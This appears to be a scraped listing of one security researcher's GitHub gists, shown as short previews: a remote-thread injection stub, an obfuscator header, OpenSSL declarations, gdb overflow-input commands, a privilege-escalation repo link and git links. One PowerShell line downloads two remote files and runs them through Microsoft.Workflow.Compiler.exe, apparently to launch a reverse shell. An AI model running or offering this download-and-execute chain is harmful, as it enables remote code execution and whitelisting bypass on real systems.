therealdreg

/* 
Create Remote Thread by Dreg - dreg@fr33project.org for https://github.com/rwfpl/rewolf-wow64ext
http://www.fr33project.org/
https://github.com/David-Reguera-Garcia-Dreg
*/

#include "stdafx.h"
#include "wow64ext.h"

DWORD WINAPI MyThreadFunction(LPVOID lpParam)

therealdreg

// https://github.com/andrivet/ADVobfuscator dreg's addaptation for easy use

#include <random>

#if defined(_MSC_VER)
#define ALWAYS_INLINE __forceinline
#else
#define ALWAYS_INLINE __attribute__((always_inline))
#endif

therealdreg

typedef struct stack_st OPENSSL_STACK;

typedef int(*OPENSSL_sk_compfunc)(const void*, const void*);
typedef void(*OPENSSL_sk_freefunc)(void*);
typedef void* (*OPENSSL_sk_copyfunc)(const void*);

int OPENSSL_sk_num(const OPENSSL_STACK*);
void* OPENSSL_sk_value(const OPENSSL_STACK*, int);

void* OPENSSL_sk_set(OPENSSL_STACK* st, int i, const void* data);

therealdreg

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;

	public class Program : SequentialWorkflowActivity

therealdreg

<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
  <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
    <d2p1:string>Rev.Shell</d2p1:string>
  </files>
  <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
    <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
    <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
    <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
    <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />

therealdreg

powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/David-Reguera-Garcia-Dreg/607bc274f9421ad267c563d115e70d09/raw/c41bc76b0b14c6d11dd66f4a4e08f29a590dc506/gistfile1.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/David-Reguera-Garcia-Dreg/cc4cf10c599dad542527203cbc3e8b44/raw/f109bfe2e2fadc0d8ea6618b2ca1d38fb5e396db/gistfile1.txt', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

therealdreg

Dreg gdb setup intel syntax, break start, print stack one value per column etc

r `perl -e 'print "A" x 300'`

gdb --args /bin/ls `perl -e 'print "A" x 300'`

gdb --args /bin/ls $(python -c "print 'A' * 64 + '\xef\xbe\xad\xde'")

set args $(python -c "print 'A' * 64 + '\xef\xbe\xad\xde'")
 

therealdreg

https://github.com/David-Reguera-Garcia-Dreg/ptrace_misconfiguration_local_privilege_escalation

therealdreg

#!/usr/bin/env python3

import re

print("By Dreg, finding all C null-end-strings in a binary blob (string must be +2 bytes)")

patt = b'([\x20-\x7E]{2,})(?=\x00)'
blob = b'aa\x10bsssss\x01\x00dddooa\x00zzzzz\x00bb\x00'

print(str(patt))

therealdreg

https://blog.verslu.is/git/git-rebase/
https://github.blog/2015-06-08-how-to-undo-almost-anything-with-git/
https://raturi.in/blog/cleaning-git-repository/
https://stackoverflow.com/questions/9813816/git-pull-after-forced-update
https://stackoverflow.com/questions/7175869/managing-hotfixes-when-develop-branch-is-very-different-from-master
https://medium.com/swlh/squash-and-rebase-git-basics-5cb1be1e0dac
https://davitenio.wordpress.com/2008/09/27/git-merge-after-git-cherry-pick-avoiding-duplicate-commits/

GIT FLOW DAY: